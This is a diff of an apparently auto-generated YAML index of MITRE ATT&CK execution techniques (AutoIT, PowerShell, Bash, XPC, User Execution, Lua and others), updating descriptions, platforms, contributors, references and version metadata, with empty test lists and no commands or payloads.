         Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
 
         Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
 
-        These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
+        These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
@@ -25491,7 +25805,7 @@ execution:
       - Liran Ravich, CardinalOps
       - Serhii Melnyk, Trustwave SpiderLabs
       - Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
-      - Monty
+      - "@_montysecurity"
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -25528,11 +25842,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:44:20.143Z'
       name: Cloud API
       description: "Adversaries may abuse cloud APIs to execute malicious commands.
         APIs available in cloud environments provide various functionalities and are
@@ -25569,11 +25882,10 @@ execution:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       x_mitre_remote_support: false
@@ -25592,13 +25904,12 @@ execution:
         url: https://github.com/Azure/azure-powershell
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1610:
     technique:
-      modified: '2024-04-11T21:24:42.680Z'
+      modified: '2024-10-15T15:06:17.124Z'
       name: Deploy a container
       description: |-
         Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -25677,12 +25988,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1610
     atomic_tests: []
   T1059:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Command and Scripting Interpreter
       description: |-
         Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
@@ -25693,6 +26003,7 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -25703,16 +26014,16 @@ execution:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      - Office 365
-      - Azure AD
       - IaaS
-      - Google Workspace
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Script: Script Execution'
       - 'Process: Process Creation'
@@ -25743,14 +26054,11 @@ execution:
         url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059
     atomic_tests: []
   T1609:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:25:45.507Z'
       name: Kubernetes Exec Into Container
       description: |-
         Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
@@ -25816,39 +26124,13 @@ execution:
         url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1609
     atomic_tests: []
   T1569.001:
     technique:
-      x_mitre_platforms:
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
-      type: attack-pattern
-      created: '2020-03-10T18:26:56.187Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1569.001
-        url: https://attack.mitre.org/techniques/T1569/001
-      - source_name: Launchctl Man
-        url: https://ss64.com/osx/launchctl.html
-        description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
-      - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
-        description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
-          Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
-        source_name: Sofacy Komplex Trojan
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-20T20:14:35.179Z'
       name: 'System Services: Launchctl'
       description: |
         Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
@@ -25857,6 +26139,7 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: "Every Launch Agent and Launch Daemon must have a corresponding
         plist file on disk which can be monitored. Monitor for recently modified or
         created plist files with a significant change to the executable path executed
@@ -25869,19 +26152,42 @@ execution:
         are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s
         or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure
         the services are unloaded prior to deleting plist files."
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
       - 'Service: Service Creation'
       - 'File: File Modification'
-      x_mitre_permissions_required:
-      - User
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
+      created: '2020-03-10T18:26:56.187Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1569/001
+        external_id: T1569.001
+      - source_name: Sofacy Komplex Trojan
+        description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+          Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+        url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      - source_name: Launchctl Man
+        description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
+        url: https://ss64.com/osx/launchctl.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1569.001
     atomic_tests: []
   T1059.008:
@@ -25924,7 +26230,7 @@ execution:
         data, modify startup configuration parameters to load malicious system software,
         or to disable security features or logging to avoid detection.(Citation: Cisco
         Synful Knock Evolution)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T20:28:09.848Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Network Device CLI
       x_mitre_detection: |-
@@ -25940,72 +26246,75 @@ execution:
       x_mitre_remote_support: true
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1559.003:
     technique:
-      x_mitre_platforms:
-      - macOS
+      modified: '2024-10-16T16:14:12.793Z'
+      name: XPC Services
+      description: |-
+        Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
+
+        Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_contributors:
+      - Csaba Fitzl @theevilbit of Kandji
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_contributors:
-      - Csaba Fitzl @theevilbit of Offensive Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Access'
+      x_mitre_remote_support: false
       type: attack-pattern
       id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
       created: '2021-10-12T06:45:36.763Z'
-      x_mitre_version: '1.0'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1559.003
         url: https://attack.mitre.org/techniques/T1559/003
+        external_id: T1559.003
       - source_name: creatingXPCservices
-        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
         description: Apple. (2016, September 9). Creating XPC Services. Retrieved
           April 19, 2022.
+        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
       - source_name: Designing Daemons Apple Dev
-        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
         description: Apple. (n.d.). Retrieved October 12, 2021.
+        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
       - source_name: CVMServer Vuln
-        url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
         description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
           in macOS and iOS. Retrieved October 12, 2021.'
+        url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
       - source_name: Learn XPC Exploitation
-        url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
         description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
           October 12, 2021.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
-
-        Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: XPC Services
-      x_mitre_detection: ''
-      kill_chain_phases:
-      - phase_name: execution
-        kill_chain_name: mitre-attack
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Process: Process Access'
-      x_mitre_remote_support: false
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1204:
     technique:
-      modified: '2024-04-12T03:46:49.507Z'
+      modified: '2024-11-11T18:52:12.103Z'
       name: User Execution
       description: |-
         An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
 
         While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
 
-        Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+        Adversaries may also deceive users into performing actions such as:
+
+        * Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
+        * Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+        * Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
+        * Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
 
         For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
       kill_chain_phases:
@@ -26013,7 +26322,11 @@ execution:
         phase_name: execution
       x_mitre_contributors:
       - Oleg Skulkin, Group-IB
-      - Goldstein Menachem
+      - Menachem Goldstein
+      - Harikrishnan Muthu, Cyble
+      - ReliaQuest
+      - Ale Houspanossian
+      - Fernando Bacchin
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
@@ -26028,7 +26341,7 @@ execution:
       - macOS
       - IaaS
       - Containers
-      x_mitre_version: '1.6'
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Instance: Instance Start'
       - 'File: File Creation'
@@ -26055,6 +26368,10 @@ execution:
         description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
           Bookmarks. Retrieved January 2, 2024.
         url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
+      - source_name: Reliaquest-execution
+        description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
+          Campaign. Retrieved August 2, 2024.
+        url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
       - source_name: Telephone Attack Delivery
         description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
           4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
@@ -26065,15 +26382,19 @@ execution:
           API forms and more to scam users in popular online game “Roblox”. Retrieved
           January 2, 2024.
         url: https://blog.talosintelligence.com/roblox-scam-overview/
+      - source_name: proofpoint-selfpwn
+        description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
+          From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
+          2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1072:
     technique:
-      modified: '2024-04-12T03:40:37.954Z'
+      modified: '2024-09-25T20:49:37.227Z'
       name: Software Deployment Tools
       description: "Adversaries may gain access to and use centralized software suites
         installed within an enterprise to execute commands and move laterally through
@@ -26090,7 +26411,7 @@ execution:
         on cloud-hosted instances, as well as the execution of arbitrary commands
         on on-premises endpoints. For example, Microsoft Configuration Manager allows
         Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
-        joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+        joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
         AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
         to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
         Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -26138,7 +26459,7 @@ execution:
       - Windows
       - Network
       - SaaS
-      x_mitre_version: '3.0'
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Application Log: Application Log Content'
@@ -26171,12 +26492,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1072
     atomic_tests: []
   T1059.001:
     technique:
-      modified: '2024-03-01T18:01:37.575Z'
+      modified: '2024-10-15T16:39:13.228Z'
       name: 'Command and Scripting Interpreter: PowerShell'
       description: |-
         Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
@@ -26237,8 +26557,9 @@ execution:
           POWERSHELL LOGGING. Retrieved February 16, 2016.
         url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
       - source_name: Github PSAttack
-        description: Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
-        url: https://github.com/jaredhaight/PSAttack
+        description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
+          2024.
+        url: https://github.com/Exploit-install/PSAttack-1
       - source_name: inv_ps_attacks
         description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
           Retrieved December 1, 2021.
@@ -26260,12 +26581,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.001
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -26343,14 +26663,13 @@ execution:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1059.004:
     technique:
-      modified: '2024-04-16T12:24:40.163Z'
+      modified: '2024-10-15T15:17:19.136Z'
       name: 'Command and Scripting Interpreter: Bash'
       description: |-
         Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
@@ -26408,36 +26727,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.004
     atomic_tests: []
   T1559:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
-      type: attack-pattern
-      created: '2020-02-12T14:08:48.689Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1559
-        url: https://attack.mitre.org/techniques/T1559
-      - source_name: Linux IPC
-        url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
-        description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
-          March 11, 2022.
-      - source_name: Fireeye Hunting COM June 2019
-        url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
-        description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
-          10, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-10T19:06:35.666Z'
       name: Inter-Process Communication
       description: "Adversaries may abuse inter-process communication (IPC) mechanisms
         for local code or command execution. IPC is typically used by processes to
@@ -26458,25 +26752,110 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
         or spawned processes that are associated with abuse of IPC mechanisms.
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
       - 'Script: Script Execution'
       - 'Process: Process Access'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      - SYSTEM
       x_mitre_remote_support: true
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+      created: '2020-02-12T14:08:48.689Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1559
+        external_id: T1559
+      - source_name: Fireeye Hunting COM June 2019
+        description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
+          10, 2019.
+        url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
+      - source_name: Linux IPC
+        description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
+          March 11, 2022.
+        url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1559
     atomic_tests: []
+  T1059.011:
+    technique:
+      modified: '2024-10-01T15:19:54.163Z'
+      name: Lua
+      description: |-
+        Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (<code>.lua</code>), or from Lua-embedded programs (through the <code>struct lua_State</code>).(Citation: Lua main page)(Citation: Lua state)
+
+        Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Script: Script Execution'
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
+      created: '2024-08-05T18:19:42.201Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1059/011
+        external_id: T1059.011
+      - source_name: Kaspersky Lua
+        description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
+          APT. Retrieved August 5, 2024.
